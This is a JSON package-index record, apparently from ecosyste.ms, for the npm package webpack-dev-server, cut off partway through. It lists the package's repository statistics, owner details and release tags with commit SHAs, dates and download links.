{"id":45,"name":"webpack-dev-server","ecosystem":"npm","repository_url":"https://github.com/webpack/webpack-dev-server","issues_count":9748,"created_at":"2025-06-06T15:01:32.470Z","updated_at":"2025-06-06T15:01:32.470Z","purl":"pkg:npm/webpack-dev-server","metadata":{"id":1239336,"name":"webpack-dev-server","ecosystem":"npm","description":"Serves a webpack app. Updates the browser on changes.","homepage":"https://github.com/webpack/webpack-dev-server#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack-dev-server","keywords_array":[],"namespace":null,"versions_count":221,"first_release_published_at":"2012-09-18T15:45:16.603Z","latest_release_published_at":"2025-06-03T15:54:06.578Z","latest_release_number":"5.2.2","last_synced_at":"2025-06-06T04:31:21.429Z","created_at":"2022-04-08T14:35:25.389Z","updated_at":"2025-06-06T04:32:55.142Z","registry_url":"https://www.npmjs.com/package/webpack-dev-server","install_command":"npm install webpack-dev-server","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"webpack-1":"1.16.5","beta":"3.0.1-beta.0","webpack-3":"2.11.5","next":"4.0.0-rc.1","version-3":"3.11.3","version-4":"4.15.2","latest":"5.2.2"}},"repo_metadata":{"id":4692726,"uuid":"5839692","full_name":"webpack/webpack-dev-server","owner":"webpack","description":"Serves a webpack app. Updates the browser on changes. Documentation https://webpack.js.org/configuration/dev-server/.","archived":false,"fork":false,"pushed_at":"2025-06-03T15:52:57.000Z","size":63667,"stargazers_count":7839,"open_issues_count":37,"forks_count":1468,"subscribers_count":115,"default_branch":"master","last_synced_at":"2025-06-04T06:14:29.648Z","etag":null,"topics":["hot-reload","server","webpack"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":".github/CODEOWNERS","security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-09-17T10:52:18.000Z","updated_at":"2025-06-04T04:03:15.000Z","dependencies_parsed_at":"2023-09-24T12:30:45.057Z","dependency_job_id":"7daf20b2-6185-4c69-94ef-8e60e20a2c90","html_url":"https://github.com/webpack/webpack-dev-server","commit_stats":{"total_commits":2583,"total_committers":288,"mean_commits":8.96875,"dds":0.7491289198606272,"last_synced_commit":"94a2443c8568c0ab4656d850b31499f5824bb0b6"},"previous_names":[],"tags_count":161,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":258318742,"owners_count":22682541,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/webpack","funding_links":[],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.2.2","sha":"195a7e6f7102e48725b1b1fbc3bb80c5df0efedf","kind":"commit","published_at":"2025-06-03T15:52:40.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.2.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"0d22a08cc96deeb4421251ff41a915dcda1b59c5","kind":"commit","published_at":"2025-03-26T23:06:03.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"bcb3725ce40fadae133b78a5b7abbf70eef87031","kind":"tag","published_at":"2024-12-11T13:31:37.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"5ee0d40b20baaf0daf2d4de8b11efe8466bd20f9","kind":"commit","published_at":"2024-09-03T18:00:38.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.1.0/manifests"},{"name":"v4.15.2","sha":"11bfcde1cbb291c349a61332937618685a98dd74","kind":"commit","published_at":"2024-03-20T15:35:27.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.15.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.15.2/manifests"},{"name":"v5.0.4","sha":"64a1860926124a1ec272441e7f406bfd7ee48093","kind":"tag","published_at":"2024-03-19T19:48:42.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.0.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"08cab58bb8759e96bf4774bec28901e9f96a3f3a","kind":"tag","published_at":"2024-03-12T14:48:18.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.0.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"507283d82325d80220347416a7b1bdecdd45d240","kind":"tag","published_at":"2024-02-16T12:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.0.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"0ebf9734fb1d3fea50195ba0a74c2842b9b3b263","kind":"tag","published_at":"2024-02-13T14:38:34.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.0.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"064644ac9f070ed48661d9392a9dc065c7cf668f","kind":"commit","published_at":"2024-02-12T13:31:58.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v5.0.0/manifests"},{"name":"v4.15.1","sha":"540c43852ea33f9cb18820e1cef05d5ddb86cc3e","kind":"tag","published_at":"2023-06-09T14:37:30.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"99f66cb73673e116a2b0420fe75d9e2803d354b9","kind":"tag","published_at":"2023-05-07T12:46:43.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"51f8a1b6f62c2a7efdc0897bc2ba2c8449d197e3","kind":"tag","published_at":"2023-05-06T23:55:28.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.14.0/manifests"},{"name":"v4.13.3","sha":"80a96fd4a989972dc308d0356c68f71c5a2abfc6","kind":"tag","published_at":"2023-04-15T17:08:26.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.13.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.3/manifests"},{"name":"v4.13.2","sha":"da278f7c8dc2e3843fb1a05ab5ad50c22dd6ece9","kind":"tag","published_at":"2023-03-31T22:17:06.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.13.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.2/manifests"},{"name":"v4.13.1","sha":"ed0ca20af719e553b666ad2a5bc35f0cecef6dd0","kind":"tag","published_at":"2023-03-18T18:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.13.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.1/manifests"},{"name":"v4.13.0","sha":"4e846078b3b9befafbc56b1cd6db7778175355c9","kind":"tag","published_at":"2023-03-17T22:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.13.0/manifests"},{"name":"v4.12.0","sha":"4ffcf2bd7100cb317b8606f3059ad31e754ec5ec","kind":"tag","published_at":"2023-03-14T17:57:12.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"418e93200419d12f1d0113cad213767baf77cf76","kind":"tag","published_at":"2022-09-19T15:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"8abb295bf79a0dc37991004e8186fa180e2e4445","kind":"tag","published_at":"2022-09-07T15:06:45.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.11.0/manifests"},{"name":"v4.10.1","sha":"eb997bba98765d78e9193b010eb845f8ace30637","kind":"tag","published_at":"2022-08-29T16:39:24.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"49efdf87341d4e40106baae60670a4aabf3285fb","kind":"tag","published_at":"2022-08-10T14:04:19.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.10.0/manifests"},{"name":"v4.9.3","sha":"fa5e454d197fc6ce7441f6c28449e1d35c83cefc","kind":"commit","published_at":"2022-06-29T19:59:33.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.9.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.3/manifests"},{"name":"v4.9.2","sha":"297f8f0417d9a852eaff9bf59b9ef418209be1bf","kind":"tag","published_at":"2022-06-06T17:12:54.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"511f51a8720e93751f1f3f70660bfec4d0756c35","kind":"tag","published_at":"2022-05-31T15:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"4340c73fbc3cfcada3cfa3efd1c87895f9135659","kind":"tag","published_at":"2022-05-04T17:04:25.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.9.0/manifests"},{"name":"v4.8.1","sha":"cfbba4a7e397f168d77d0fdc338b5c4ad673ab66","kind":"tag","published_at":"2022-04-06T11:32:27.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"5aad1e72eee98f0947a85706b1256a3c7834b094","kind":"tag","published_at":"2022-04-05T11:58:32.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.8.0/manifests"},{"name":"v4.7.4","sha":"92c602a7dde861badfc4758510af596f6a14e9a0","kind":"tag","published_at":"2022-02-02T10:50:52.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.7.4","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.4/manifests"},{"name":"v4.7.3","sha":"d834582b99b591f2494f7f680e9ec55c39ea79a0","kind":"commit","published_at":"2022-01-11T17:44:27.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.7.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"75999bb9bb8803de633fcb037405f45a5bf7d029","kind":"commit","published_at":"2021-12-29T19:40:12.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.7.2","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"afe49753b9f38679d200e88059bbe9a97e25e368","kind":"commit","published_at":"2021-12-22T16:28:28.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.7.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"b0c98f047e41116d947490e3adcdfaccaaf9afb5","kind":"commit","published_at":"2021-12-21T17:55:20.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"c5b9c7e8bc50f72f0fb27092249aeefaf0817840","kind":"tag","published_at":"2021-11-25T20:02:05.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"aaa42f00ec9e94e60eb67e8a4297ed78fa9c788e","kind":"commit","published_at":"2021-11-13T12:50:56.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.5.0/manifests"},{"name":"v3.11.3","sha":"aa3cddcf6eb2347704870f0e0cf33bc211e2a378","kind":"tag","published_at":"2021-11-08T16:29:29.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v3.11.3","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v3.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v3.11.3/manifests"},{"name":"v4.4.0","sha":"4d51f5a115e492e9031eb304a67daff775b830df","kind":"commit","published_at":"2021-10-27T18:04:20.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.4.0/manifests"},{"name":"v4.3.1","sha":"af44710fec1571ca2c9c4265df2eca375856579c","kind":"tag","published_at":"2021-10-04T17:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.3.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"1b6e2424b9b4b17b8dcac16f373212dafd89c84b","kind":"tag","published_at":"2021-09-25T14:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"612c050b0e715016feacec7f96b69d53fc6d3330","kind":"tag","published_at":"2021-09-13T23:05:40.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.2.1","html_url":"https://github.com/webpack/webpack-dev-server/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack-dev-server/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"9bb6f7894833fa561882258a307e45294427187b","kind":"commit","published_at":"2021-09-09T18:53:58.000Z","download_url":"https://codeload.github.com/webpack/webpack-dev-server/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack-dev-server/rele